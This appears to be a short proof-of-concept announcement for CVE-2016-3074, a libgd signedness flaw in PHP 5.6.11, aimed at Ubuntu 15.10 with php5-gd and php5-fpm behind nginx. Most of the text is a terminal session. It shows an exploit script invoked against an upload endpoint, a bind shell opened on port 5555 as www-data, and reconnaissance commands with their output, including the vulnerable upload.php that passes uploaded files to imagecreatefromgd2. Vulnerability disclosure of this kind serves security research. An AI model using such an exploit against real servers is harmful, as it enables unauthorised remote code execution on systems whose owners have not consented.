CVE-2016-3074: php 5.6.11 + libgd: signedness vulnerability
Apr 22, 2016PoC for CVE-2016-3074 targeting Ubuntu 15.10 x86-64 with php5-gd and php5-fpm running behind nginx.
$ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php
[*] this may take a while
[*] offset 912 of 10000...
[+] connected to 1.2.3.4:5555
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC
2016 x86_64 x86_64 x86_64 GNU/Linux
dpkg -l|grep -E "php5-(fpm|gd)"
ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ...
ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ...
cat upload.php
<?php
imagecreatefromgd2($_FILES["file"]["tmp_name"]);
?>